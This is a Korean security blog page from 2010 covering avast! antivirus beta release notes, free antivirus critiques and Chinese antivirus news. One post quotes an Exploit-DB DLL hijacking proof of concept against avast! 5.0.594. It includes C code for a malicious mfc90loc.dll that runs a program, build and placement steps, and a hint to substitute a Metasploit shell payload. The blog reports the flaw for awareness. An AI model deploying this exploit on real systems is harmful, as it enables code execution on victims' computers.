어베스트! V5 버전이 출시되면서 베타 버전의 출시에도 약간의 변화가 생겼습니다. 즉, 마이너 버전이라 하더라도 정식 출시 전에 베타로 먼저 출시한 후에 문제점이 있는지 먼저 검증합니다.

이번에 발표하는 베타 버전은 어베스트! 무료 버전, 프로 에디션, 인터넷 시큐리티 제품 모두에 해당합니다. 다운로드 링크는 다음과 같습니다.

•무료 제품: http://files.avast.com/files/beta/5.0.661/setup_av_free.exe
• 프로 제품: http://files.avast.com/files/beta/5.0.661/setup_av_pro.exe
• 인터넷 시큐리티: http://files.avast.com/files/beta/5.0.661/setup_ais.exe

기존에 V4.8 제품이나 V5.0.xxx 제품을 사용하고 있더라도 모두 적용이 가능하며, 업데이트 설치가 완료된 후에는 반드시 재부팅을 해야 합니다. 또한 기존 최신 정식이었던 V5.0.594를 설치하여 사용중이라도 업데이트할 수 있습니다.

어베스트! V5.0.661 베타에서 개선되거나 추가된 기능은 다음과 같습니다.

• 라이선스 파일에 관련된 취약점 해결 - DLL Hijacking 취약점(SA41109)
• 파일 시스템 방어 상태에서 사용자 인터페이스 문제점 해결 
• 긴 파일이름을 가진 파일을 검사할 때 발생하는 문제점 해결
• 윈도우에서 다른 언어로 사용하는 경우 아시아 계얼의 버전에서 업데이터에서 발생하는 문제 해결
• Urdu(우르두 어, 파키스탄 공용어) 언어 추가

참고로, 어베스트! V5.0.656 베타에서 개선되거나 추가된 기능은 다음과 같습니다.

• 어베스트! 서비스가 사자리는 문제점 해결
• 행동방어: 안정성 문제 해결(aswSP.sys)
• 어베스트! 샌드박스에서 안정서 및 성능 향상
• 특정한 새로운 형태의 익스플로잇을 진단 및 차단하기 위해 엔진 일부 변경
• 업데이트 속도 향상
• IS: aswFw.sys에서 발견된 취약점 해결(Secunia Advisory SA40868)
• IS: 새로운 안티스팸 엔진으로 업그레이드
• GUI에서 일부 사항 변경 및 버그 수정
• 스크린 리더 지원 향상
• 언어 추가:  덴마크어, 헤브류어


출 처: http://forum.avast.com/index.php?topic=63151.0

감사합니다.


PS: 최근 발견된 DLL Hijacking 취약점이 해결되었습니다.

끝.

reTweet
Posted by 문스랩닷컴
blog comments powered by Disqus

    댓글을 달아 주세요

    어베스트! V5 버전이 출시되면서 베타 버전의 출시에도 약간의 변화가 생겼습니다. 즉, 마이너 버전이라 하더라도 정식 출시 전에 베타로 먼저 출시한 후에 문제점이 있는지 먼저 검증합니다.

    이번에 발표하는 베타 버전은 어베스트! 무료 버전, 프로 에디션, 인터넷 시큐리티 제품 모두에 해당합니다. 다운로드 링크는 다음과 같습니다.

    •무료 제품: http://files.avast.com/files/beta/5.0.656/setup_av_free.exe
    • 프로 제품: http://files.avast.com/files/beta/5.0.656/setup_av_pro.exe
    • 인터넷 시큐리티: http://files.avast.com/files/beta/5.0.656/setup_ais.exe

    기존에 V4.8 제품이나 V5.0.xxx 제품을 사용하고 있더라도 모두 적용이 가능하며, 업데이트 설치가 완료된 후에는 반드시 재부팅을 해야 합니다. 또한 기존 최신 정식이었던 V5.0.594를 설치하여 사용중이라도 업데이트할 수 있습니다.


    어베스트! V5.0.656 베타에서 개선되거나 추가된 기능은 다음과 같습니다.

    • 어베스트! 서비스가 사자리는 문제점 해결
    • 행동방어: 안정성 문제 해결(aswSP.sys)
    • 어베스트! 샌드박스에서 안정서 및 성능 향상
    • 특정한 새로운 형태의 익스플로잇을 진단 및 차단하기 위해 엔진 일부 변경
    • 업데이트 속도 향상
    • IS: aswFw.sys에서 발견된 취약점 해결(Secunia Advisory SA40868)
    • IS: 새로운 안티스팸 엔진으로 업그레이드
    • GUI에서 일부 사항 변경 및 버그 수정
    • 스크린 리더 지원 향상
    • 언어 추가:  덴마크어, 헤브류어


    출 처: http://forum.avast.com/index.php?topic=63151.0

    감사합니다.


    PS: 최근 발견된 DLL Hijacking 취약점에 대해서는 아직 언급되지 않은 상태입니다.

    끝.
    reTweet
    Posted by 문스랩닷컴
    blog comments powered by Disqus

      댓글을 달아 주세요

      최근 보안 아니 윈도우 업계를 강타하고 있는 취약점이 바로 DLL Hijacking입니다. DLL은 윈도우 실행파일이 참조하는 라이브러리 파일인데, 문제는 DLL 파일의 경로를 제대로 검증하지 않아 이를 통해 공격을 하는 형태로 이미 예전부터 예견되어 있던 취약점입니다.

      DLL Hijacking 취약점에 대한 자세한 사항은 아래 링크를 참고하시면 금방 이해가 되실 것으로 생각됩니다.


      하여튼, 어베스트! 안티바이러스 제품의 최신 버전에서도 DLL Hijacking 취약점을 가지고 있는 것으로 알려져 있습니다. 어베스트!의 최신 버전은 V5.0.594이며, mfc90loc.dll 파일에서 이 취약점이 존재합니다. mfc90loc.dll은 라이선스 파일에 관련된 DLL 입니다.

      # Exploit Title: avast! license files DLL Hijacking Exploit (mfc90loc.dll)
      # Date: 25/08/2010
      # Author: Bruno Filipe (diwr) http://digitalacropolis.us
      # Software Link: http://www.avast.com <http://www.bsplayer.org>
      # Version: <= 5.0.594
      # Tested on: WinXP SP2, WinXP SP3
      # Thx TheLeader ;)
      #
      ----------------------------------------------------------------------------------------------------------
      # This should work with avast license files (.avastlic)
      # 1. gcc dllmain.c -o mfc90loc.dll
      # 2. Put mfc90ptb.dll in the same directory of an avast license file (EG:
      anything.avastlic)
      # 3. You can generate a msfpayload DLL and spawn a shell, for example.
      #
      ----------------------------------------------------------------------------------------------------------

      #include <windows.h>

      int main()
      {
      WinExec("calc", SW_NORMAL);
      exit(0);
      return 0;
      }

      BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
      {
      main();
      return 0;
      }

      하지만 실제적으로 어베스트!에서는 실시간 감시 및 자기 보호 기능이 월등하기 때문에 이 취약점을 직접적으로 이용하여 공격하기에는 약간 어려운 부분이 있을 수 있습니다만, 그래도 어베스트! 제작사의 빠른 대응이 필요한 시점으로 보입니다.

      감사합니다.

      출처: http://www.exploit-db.com/exploits/14743/


      reTweet
      Posted by 문스랩닷컴
      blog comments powered by Disqus

        댓글을 달아 주세요

        IT 산업에 있어서도 중국의 약진이 서서히 나타나는 가운데, 백신(안티바이러스) 시장에서도 일대 변혁이 일어날 조짐을 보이고 있습니다.

        중국에는 다수의 백신 개발사가 있으며, 이중 기술력을 어느정도 가진 것으로 검증된 회사만 해도 서너개 정도 됩니다. 여기서 검증이라는 의미는 ICSA Labs나 VB100 인증을 통과했다는 의미입니다.

        Keniu Network Technology는 kingsoft Antivirus 회사를 계열로 가지고 있는 Beiker.com을 인수 합병한 이후에, 이 제품을 이용하여 첫번째 무료 백신을 지난 8월 11일에 발표한다고 공개했습니다.

        백신 이름은 Keniu Antivirus 1.0 이며, 주요 엔진은 듀얼로, 카스퍼스키 안티바이러스 OEM 엔진과 자체 기술로 개발된 클라우드 기반의 엔진으로 구성된다고 합니다.

        아직 중국이나 인도에서 개발된 보안 제품들은 사용자 인터페이스가 투박하고 촌스럽다는 평이 많습니다만, 실제로 기능만으로 살펴 본다면 국내 제품과 성능이 엇비슷하거나 더 훌륭한 제품이 있는 것 또한 사실입니다.


        아래는 최근에 평가한 결과인데, 결과가 재미있어 첨언합니다.

        < http://arrestlove.tistory.com 에서 발췌함 >

        2010년 8월 바이러스 블러틴이 실시한 평가에서 아이러니하게도 Kingsoft 제품은 전멸, Keniu 제품은 통과했습니다. 이제 낙장 불입!

        감사합니다.
        reTweet
        Posted by 문스랩닷컴
        blog comments powered by Disqus

          댓글을 달아 주세요

          1. Favicon of http://arrestlove.tistory.com BlogIcon 물여우 2010.08.13 13:17  댓글주소  수정/삭제  댓글쓰기

            킹소프트와도 연관성이 있었군요. 킹소프트도 다양한 제품군을 항상 vb100에 내보내던데, 이번에는 약간 아쉬웠나 봅니다.

            그나저나 keniu가 무료 제품이었다니 또 혹하네요. ^^;

          외국에서 인기있는 무료백신(Free Antivirus, 공짜백신)의 링크를 모아 봤습니다. 필요하신 분들 이용하시기 바랍니다.


          이외에도 많은 제품들이 있습니다만, 가짜백신이거나 유료제품과 성능이나 기능적 차이가 나는 경우가 많습니다.

          감사합니다.
          reTweet
          Posted by 문스랩닷컴
          blog comments powered by Disqus

            댓글을 달아 주세요

            우리나라에서는 무료 백신(공짜 백신, 무료 안티바이러스)가 널리고 널렸습니다. 공짜 백신 천국이라고도 과언이 아닙니다. 지난 번에 백신이라면 최소한 이러한 기능은 가져야 한다고 하는 글을 게재한 적이 있습니다.


            오늘 풀 내용은 바로 무료 백신의 단점에 대해 언급하고자 합니다. 원래 글은 "Good Virus Protection Doesn't Have To Be Expensive. 좋은 백신 제품은 비싸지 않다"인데, 실제 내용을 보면 무료 백신에서 간과하고 있는 즉, 빠진 기능에 대해 언급하고 있어 정리해 봅니다.


            무료 백신은 국내 뿐만 아니라 외국에서도 널리 보급되어 있으며, 본 글의 특성 상 국내 제품은 언급하지 않습니다. 하지만, 실제 내용을 보신다면 국내 제품에 대한 서글픈 현실을 파악할 수 있을 것으로 생각됩니다.


            1. 업데이트 주기

            보통 백신은 바이러스의 흔적을 기록한 시그내처(Signature)를 데이터베이스에 저장하여 파일을 검사할 때 비교하여 동일한 경우 감염되었다고 알리는 방식을 사용합니다. 하지만, 일부 무료 백신 제품은 같은 회사의 유료 제품에 비해 이 업데이트 방식에 차이가 있는 경우가 있습니다. Avira AntiVir Personal Free Edition은 업데이트 주기가 정품과 약간 차이가 있다고 알려져 있습니다.(출처: http://arrestlove.tistory.com/97 ) 하지만, 실제 사용자 입장에서 시그내처 뿐만 아니라 인공 지능(휴리스틱), 행동 기반과 같이 부가적인 진단 기술로 인해 그리 큰 단점으로 보기는 어렵습니다.



            2. 행동 기반의 진단 방식

            행동(Behavioral) 기반이란 특정 프로그램이 동작하는 과정 중에 바이러스와 유사한 행동을 하는지 감시하여 특정 기준을 초과할 경우에는 이를 진단하여 차단하는 기술을 의미합니다. 최근 많이 추가되고 있는 추세이지만 일부 제품에서는 기능이 빠져 있습니다. 따라서 이러한 경우에는 ThreatFire Antivirus와 같이 보조적인 백신을 사용하는 것이 좋습니다.



            3. 웹 감시 모듈의 탑재

            최근 SQL Injeciton 공격이나 웹페이지 삽입 등으로 인해 인터넷을 서핑하는 도중에 자동으로 악성 프로그램을 다운로드하여 설치 및 감염되는 사례가 많습니다. 이러한 공격을 예방하기 위해서는 윈도우의 최신 보안 패치가 되어 있어야 한다는 전제가 있지만, 백신의 기능이라는 점에서 본다면 웹 브라우저로 주고받는 컨텐츠를 실시간으로 감시하여 중간에 이를 탐지 및 차단하는 기능이 필요합니다.

            참고로, 국내 모 업체 제품의 경우 인터넷 임시 폴더에 다운로드한 감염된 파일을 제대로 처리하지 못하기도 합니다.

            AVG Anti-Virus Free Edition의 경우 이 기능이 빠져 있는 것을 홈페이지에서 확인할 수 있습니다.(출처: http://www.avgkorea.com/product/antivirus9.asp )



            4. 광고 창

            아직까지 유명한 무료 제품에서 광고가 짜증난다고 하는 것을 본적은 거의 드믑니다. 일부 가짜 백신이 이러한 광고 창을 마구마구 보여 주곤 합니다.

            재미있는 점은 일부 제품에서는 유료 제품을 구매하라는 창을 보여주기도 하지만, MSE(Microsoft Essentials)는 그러한 광고를 보여 주지 않으며, 그 이유는 유료 제품이 없기 때문이라는 재미난 얘기도 있습니다.


            지금까지, 무료 백신을 사용할 때 주의해야 할 사항에 대해 간략히 언급해봤습니다. 일부 제품의 경우에 기능이 빠져 있는지 사용하기 전에 먼저 확인하시기 바랍니다.

            참고로, 국내 무료백신의 경우에는 할말이 전혀! 없기 때문에 생략합니다.

            감사합니다.
            reTweet
            Posted by 문스랩닷컴
            blog comments powered by Disqus

              댓글을 달아 주세요

              1. 아무개 2010.07.31 14:59  댓글주소  수정/삭제  댓글쓰기

                어베스트의 경우엔 무슨 기능이 빠져있나요?

                • Favicon of https://moonslab.tistory.com BlogIcon 문스랩닷컴 2010.07.31 15:49 신고  댓글주소  수정/삭제

                  어베스트!의 경우에는 '광고'가 들어가 있다는 거죠.

                  사용자를 귀찬게 하진 않는데,

                  프리 버전 설치 후 라이선스등록할 때 한번 더 확인하는

                  것 이외에는 없는거 같아요.

              2. Favicon of http://swbae.egloos.com BlogIcon 헐랭이 2010.07.31 17:14  댓글주소  수정/삭제  댓글쓰기

                AVG 9 Free 버전에서 Link Scanner 활성화 되어 있음.

                • Favicon of http://arrestlove.tistory.com BlogIcon 물여우 2010.07.31 19:20  댓글주소  수정/삭제

                  AVG의 경우도 기능이 상당히 다채로운데 안티 바이러스 엔진을 통해 사이트 접속시 실시간으로 검사하는 기능인 웹실드가 무료 제품에는 빠져있습니다. 링크 스캐너는 특정 스크립트 파일을 익스플로잇으로 진단하기는 하던데 웹실드 같은 기능은 아니더군요.

                • Favicon of https://moonslab.tistory.com BlogIcon 문스랩닷컴 2010.07.31 19:50 신고  댓글주소  수정/삭제

                  그래서 제가 일부러 언급한 건데요.

                  엔진 레벨에서 지원해야 하는데,

                  외부적인 측면이 강하죠.

                  가령, 사이트가드 ?

                  그래도, 댓글 감사드려요~

              3. Favicon of http://arrestlove.tistory.com BlogIcon 물여우 2010.07.31 20:30  댓글주소  수정/삭제  댓글쓰기

                본문과는 다소 상관없는 이야기입니다만... 개인적으로 항상 드는 의문은 (안티 바이러스 엔진이 실시간으로 파일 생성까지 제대로 관리하고 있다는 가정하에) 웹브라우저든 다른 방법이든 외부에서 시스템에 파일이 다운되어 보조 메모리(하드)에 생성될 때, 실시간으로 악성코드를 진단할 수 있을 터인데, 웹실드와 같은 추가적인 진단방법이 과연 필요할지가 항상 궁금해집니다. 물론 노드나 어베스트의 경우 웹트래픽 검사시 추가적인 db가 있는 것 같긴 하던데, 카스퍼스키나 안티버, avg와 같이 대부분의 경우는 일반 엔진과 db면에서 전혀 차이도 없구요.

                • Favicon of https://moonslab.tistory.com BlogIcon 문스랩닷컴 2010.07.31 20:34 신고  댓글주소  수정/삭제

                  어베스트!를 예를 들자면,

                  웹 브라우저를 쓰다 악성코드가 진단되는 경우는

                  1. 파일 - 파일감시 프로바이더,

                  2. 스크립트(html/js 등) - 스크립트 프로바이더.

                  3. iframe 과 같은 형태 - 웹 방어 프로바이더.

                  4. url - 네트워크 프로바이더.

                  이런 식으로 복합적으로 동작을 하게 되어 있습니다.

                  즉, 대응 방식이 틀려지게 되는 것이죠.

                  아마 다른 제품들도 유사하지 않나 생각됩니다.

                • 2010.07.31 21:12  댓글주소  수정/삭제

                  비밀댓글입니다

              최근 인터넷 신문 사이트에 나온 기사를 보고 참으로 어이없기도 하고, 저렇게 멋도 모르고 사용하는 사람들이 많다는 데에 안타까운 마음이 들어 잠시 글을 적어 봅니다.

              주: 안티바이러스 라는 용어가 적합하지만, 백신 이라는 단어를 더 많이 쓰므로 이 단어로 통일해서 언급합니다.

              무료백신 이용자 3천만명 육박 - 디지털 타임즈
              http://www.dt.co.kr/contents.html?article_no=2010072802010960746006

              알약: 1762만명
              V3 라이트: 958만명
              네이버백신: 269만명
              기타: SGA, MSE 등등... ...

              국내 백신(안티바이러스) 시장은 말 그대로 진흙탕 속에 있는 미꾸라지, 진상들입니다. 저변 확대 및 마케팅 차원에서 유료로 받아야 할 제품을 무료로 마구 뿌려대고 있습니다. 또한, 모 업체도 이러한 분위기에 편승하고 있는 실정입니다. 무료로 제공한다는 점에 대해서 뭐라 하는 것보다는 실제로 무료로 쓸만한 가치가 있는지에 대해 한번 언급해 보고자 합니다.

              아래 사항은 약간 전문적인 용어등이 사용될수 있지만, 최대한 약하게 서술하도록 노력했습니다.

              백신 제품이 가져야 할 기본적인 기능을 필자가 간단히 정리해 봤습니다.


              1. 자체 엔진 보유 여부

              엔진은 백신의 핵심으로 사람으로 치자면 심장이나 뇌에 해당하는 부분입니다. 국내 백신 중에서 자체 엔진을 가진 회사는 한 2-3개 될 겁니다. 나머지는 모두 다른 회사의 SDK(번들, OEM 엔진)을 구매해서 사용하는 실정입니다. 만약 엔진에 관련되어 문제가 발생한다면 이 문제를 즉시 해결하기가 매우 어렵게 됩니다. 그러다보니, 어떤 업체에서는 자체 엔진을 결합하는 다중 엔진으로 가기도 합니다. 그런데, 엔진도 제대로 못만드는데 무슨 다중 엔진을 개발한다는 건지, 제대로 개발이나 되는 건지 참 답답합니다.


              2. 백신의 기능 

              백신의 가장 중요한 기능은 감염된 객체(파일, 레지스트리, 프로세스 등)를 진단하여 삭제하거나 예방하거나 치료하는 것입니다. 만약 제대로 진단하지 못한다면 어떻게 될까요? 당연히 감염될 가능성이 높게 되며, 아주 나쁘게 표현한다면 "설치하나 마나'한 상태라고 볼 수 있습니다. 

              국제적으로 백신의 진단률을 평가하는 다양한 기관 및 방법이 있으며, 이에 대해서도 말들이 많습니다.

              필자는 적어도 '인간적으로' ITW(In The Wild)는 잡아야 하지 않나 싶습니다. 참고로 ITW는 전세계에서 실제로 바이러스가 검출된 곳이 2군데 이상 판명된 것으로, 실제 바이러스 맞습니다. 맞고요. 이정도는 잡아야 백신이라 라는 의밉니다. VirusBTN 등에서 평가한 결과를 참고하시면 될 거 같고, 솔직이 여기 테스트에 참여하지 못한 거는 백신 이라는 이름도 적을 가치도 없습니다.


              3. 실시간 감시

              보통 파일을 검사해서(이거를 수동 검사라고 합니다) 감염된 파일을 찾아 내는 방식은 보다 수동적인 행태입니다. 실시간 감시는 백신의 엔진 프로세스를 운영체제 상에서 항상 돌아가도록 함으로써 컴퓨터에서 파일을 다운로드하거나, 복사하거나, 열거나 할 때 미리 감염여부를 검사하는 것입니다. 이러한 실시간 감시 기능이 지원되어야 하며, 어떤 제품의 경우에는 특정 폴더에 있는 파일은 검사하지 못하는 치명적인 문제점을 가지고 있습니다만, 언급하면 명예훼손으로 고소할 가능성이 있어 그냥 맙니다.


              4. 자기 보호

              최근 바이러스들은 백신의 실시간 감시 또는 실행 프로그램 파일을 인식하여 이를 공격하는 행태를 보입니다. 백신은 바이러스가 출현한 이후에 그걸 분석하고 나서야만 진단할 수 있게 되므로 최신 바이러스는 백신을 손쉽게 공격할 수 있습니다. 물론, 공격이 성공하면 백신은 무용지물, 그러면 '있으나 마나'하게 되는 겁니다.

              이렇게 자기 보호기능이 반드시 필요한 데, 실제 어떤 제품에서는 실행 프로세스 자체도 보호하지 못하는 어이없는 상황도 많습니다.



              위의 도표는 필자가 볼 때 백신은 적어도 저정도의 기능은 제공되어야 한다고 생각하여 작성한 것입니다. 물론, 기능이 제공된다고 100% 제대로 동작한다고는 말할 수 없겠지만 말이죠. 특히, 색깔로 표시된 부분은 반드시 제공해야 하는 기능이라고 말할 수 있는 핵심 중의 핵심입니다.

              예를 들어, 의약품과 건강보조식품은 구분되어야 하고, 그렇게 광고가 되고, 그렇게 판매가 됩니다. 물론, 잘못 적으면 법적인 판단이 기다리죠.

              따라서, 기본적인 기능도 제대로 못해주는 백신이라는 제품은 그냥 건강보조식품일 뿐입니다. 착각하지 마시기 바랍니다.


              그 외에도 업데이트, 개인용 방화벽, 안티 스팸, 편의 기능(파일, 레지스트리 최적화) 와 같이 보조적인 내용도 많지만 여기까지만 언급합니다.

              자, 지금까지의 사항을 모두 정리한 후에 맨 처음 언급한 무료 백신 기사를 살펴 보면 어떻게 될까요?

              제목: 국내 무료 백신 사용자 수 그리 많지 않아!


              감사합니다.

              PS: 이 글에 다른 의견을 가지신 분은 팍팍 댓글로 알려 주셔서 편협한 제 사고를 깨쳐 주셨으면 좋겠습니다.

              끝.

               
               
              reTweet
              Posted by 문스랩닷컴
              blog comments powered by Disqus

                댓글을 달아 주세요

                1. Favicon of http://arrestlove.tistory.com BlogIcon 물여우 2010.07.28 13:37  댓글주소  수정/삭제  댓글쓰기

                  다소 민감한 부분을 포스팅하셨네요. 사실 일반 유저들의 보안에 대한 마인드는 여러 개의 안티바이러스를 함께 설치하거나 안되겠다 싶으면 포맷하면 되지 수준이기 때문에 제품 자체의 성능과 완성도는 고려 대상이 아니지 않을까 싶습니다. 끽해야 진단율에 조금 민감한 정도???


                  그리고 제가 바제2에 가입할 때만 해도 제품 자체의 실시간 감시나 기타 다른 기능들을 분석하고 문제를 논의했던 글이 꽤 많았고, 그로 인해서 특정 제품의 기능 개선도 이끌어 냈었는데, 요즘에는 그런 정보를 찾아보기가 상당히 어렵다는 것도 한 몫하는 것 같습니다. 문스랩님처럼 직접 분석이 가능한 수준의 분들은 다 아시겠지만 그런 고급(?) 정보들이 공유가 안되니 일반 유저들은 업체들의 마케팅에 나오는 문구나 업체의 이름만 보고 설치하는 분들이 대부분이 아닐까 합니다.


                  좋은 글 잘보고 갑니다.

                  • Favicon of https://moonslab.tistory.com BlogIcon 문스랩닷컴 2010.07.28 13:47 신고  댓글주소  수정/삭제

                    댓글 감사합니다.

                    외국 사례처럼,

                    우리나라에서도 공신력있는 민간기관이 만들어져서,

                    어느 정도의 필터링(?)이 되었으면

                    소비자들이 훨씬 안전하게 컴퓨터를 쓸 수 있지

                    않을까 생각이 듭니다.

                    댓글 감사드려요~.

                2. 레몬색하늘 2010.07.28 14:24  댓글주소  수정/삭제  댓글쓰기

                  몇몇 업체에서 좀 아파할 지도 모르는 글이네요.
                  (카페에서 얘기하기 힘든 부분이죠)

                  물여우님 말씀대로 예전에는 고급 정보들이 꽤 많았지만
                  요즘은 그런 정보들을 찾기가 좀 어렵지요.

                  업체의 실명까지 밝혔다간 문스랩님께 태클이 들어갈지도 모르니
                  (그렇게 되면 문스랩님이 상당히 피곤해지시겠죠)
                  업체 실명은 안 밝히셨지만 어디인지 대충 짐작은 갑니다. ㅎㅎㅎ

                3. Favicon of https://alllink.tistory.com BlogIcon 링크정보 2010.07.28 15:36 신고  댓글주소  수정/삭제  댓글쓰기

                  사용자가 3천만명이 아니라 다운로드 수가 3천만번 아닐까 싶습니다.
                  무료 백신이라고 폄하하는 건 아니니만 사용자에게 "공짜니까 그냥 써"라는 생각을 하고 있는 건 아닌지 의심스럽습니다.

                4. Favicon of http://twitter.com/_960723 BlogIcon GoNe- 2010.08.02 20:06  댓글주소  수정/삭제  댓글쓰기

                  사용자들도 문제가 되겠지만, 광고수익을 높히려는 공급자측에서도 문제가 많은 것이 현실이지요.
                  특정 사이트를 시작페이지로 지정하기만 하면 백신을 까라는 경고가 뜨거나 또는 netXX에서는 업데이트마다 스폰서로 특정 백신을 깔게 해버리죠.
                  예전에는 P2P나 했을 몹슬짓을 유명사이트들에서 한다는 것도 가슴아픈 일입니다 ㅠㅠ

                최근 마이크로소프트가 야심차게 추진하고 있는 보안 솔루션 가운데 개인용 PC에 무료로 제공되는 MSE(Microsoft Essentials)라는 제품이 있습니다.

                초기 제품의 경우에는 지원하는 기능이 다른 상용 제품과 비교할 때 부족함이 많았습니다만, 최근 많이 개선되고 있습니다.

                이 번주 초에 MS Connect 사이트에서 MSE의 새로운 베타를 다운로드하여 설치할 수 있도록 제공됩니다.



                새롭게 추가되거나 향상된 기능을 정리하면 다음과 같습니다.
                • 윈도우 방화벽과 통합 - 사용자가 MSE를 설치하는 도중에 윈도우 방화벽을 켜거나 끌 수 있음.

                • 웹 기반의 공격을 차단하기 위해 인터넷 익스플로러와 통합.
                • 진단 속도 및 성능이 향상된 안티 말웨어 엔진.
                • 네트워크로 침입하는 익스플로잇 공격을 차단하기 위한 네트워크 진단 시스템 기능 추가.
                참고로, MSE의 새 정식 버전은 올해 말 경에 출시될 예정이라고 합니다.

                감사합니다.


                reTweet
                Posted by 문스랩닷컴
                blog comments powered by Disqus

                  댓글을 달아 주세요

                  라바소프트는 Ad-Aware라는 보안 제품으로 어느 정도 성능을 인정받고 있는 외국 보안 기업입니다.

                  가장 관심을 두는 분야는 바로 무료 제품인데, 라바소프트에서는 Ad-Aware Free + AntiMalware 라는 긴 이름을 가진 제품이 있습니다. 이 제품은 AntiSpyware와 Anti-RootKit 기능을 가지고 있습니다만, 아쉽게도 Anti-Virus 기능은 탑재되어 있지 않습니다.

                  Antivirus 기능이 탑재된 제품은 유료로 판매되고 있으며, 이름은 Ad-Aware Pro라고 불리웁니다.

                  이 제품에 대한 자세한 사항은 아래 링크를 참고하십시오.


                  하여튼, 이번에 새롭게 출시하는 무료 제품인 Ad-Aware Free Internet Security 제품에서는 드디어 Anti-Virus 제품이 포함되었으며, 특히 휴리스틱(Heuristic) 기술 또한 탑재되어 보다 나은 진단 성능을 가질 것으로 예상됩니다.


                  제품의 성능이나 기능에 대해서는 해당 사이트의 자료를 참고하기 바라며, 간략하게 제품이 제공하는 기능에 대해 정리합니다.

                  1. 지원하는 운영체제

                  • Windows 2000 Pro
                  • Windows XP (32비트)
                  • Windows Vista (32/64비트)
                  • Windows 7 (32/64비트)


                  2. 지원하는 언어

                  • 영어, 중국어, 네덜란드어, 프랑스어, 독일어, 이탈리아어, 일본어, 포르투칼어 등등
                  • 한글 지원 안함


                  3. 주요 특징

                  • 안티스파이웨어 기능 뿐만 아니라 안티바이러스 기능까지 탑재하므로써 다양한 악성 프로그램을 효과적으로 차단할 수 있음.
                  • Ad-Watch Live 기본형(실시간 보호) 제공
                  • 휴리스틱(Genotype, 행동 기반) 지원
                  • 루트킷 차단
                  • 예약 기능
                  • Neutralizer(재부팅 시에 감염을 재시도하는 악성 코드 차단)
                  • 인터넷 익스플로어용 다운로더 지원
                  • 시스템 자원 최소 사용
                  • 기본/고급 인터페이스 지원
                  • 스킨 지원
                  • ThreatWork(감염이 의심되는 파일을 분석팀으로 전송) 접수 시스템 제공
                  • 자동 업데이트


                  아직 Ad-Aware Free Internet Security 제품에 대한 충분한 테스트 결과나 자료가 부족한 편입니다. 따라서, 본 제품을 사용할 때에는 테스트 시스템과 같이 중요하지 않은 시스템에서 충분히 검증한 후에 사용하시기 바랍니다.

                  감사합니다.

                  출처 및 다운로드: http://www.lavasoft.com/products/ad_aware_free.php




                   

                  reTweet
                  Posted by 문스랩닷컴
                  blog comments powered by Disqus

                    댓글을 달아 주세요

                    어베스트! V5 버전이 출시되면서 베타 버전의 출시에도 약간의 변화가 생겼습니다. 즉, 마이너 버전이라 하더라도 정식 출시 전에 베타로 먼저 출시한 후에 문제점이 있는지 먼저 검증합니다.

                    이번에 발표하는 정식 버전은 V5.0.590 베타 버전의 뒤를 이은 것으로 어베스트! 무료 버전, 프로 에디션, 인터넷 시큐리티 제품 모두에 해당합니다.

                    어베스트! V5.0.594 정식에서 개선되거나 추가된 기능은 다음과 같습니다.

                    • 윈도우 시스템 복원 내에 VPS가 손상된 경우에는 자동 복구 기능 추가
                    • 자기 보호(aswSP.sys): 안정성 문제 해결
                    • 활성화 코드 기능 추가
                    • 어베스트! 샌드박스 기능 향상
                    • 행동 방어 성능 향상
                    • 윈도우 비스타 64비트 버전에서 어베스트! 화면 보호기 지원 및 느려지는 문제점 해결
                    • 네트워크 모듈(aswTdi.sys)의 안정성 향상 - AVG 제품과의 호환성 문제 해결
                    • 인터넷 시큐리티 방화벽: BSOD가 발생할 수 있는 잠재적인 문제점 해결
                    • GUI에서 문제점 수정
                    • 언어 추가: 카탈로니아어, 벨라루스어

                    출 처: http://forum.avast.com/index.php?topic=61230.0

                    감사합니다.

                    reTweet
                    Posted by 문스랩닷컴
                    blog comments powered by Disqus

                      댓글을 달아 주세요



                      Web Analytics Blogs Directory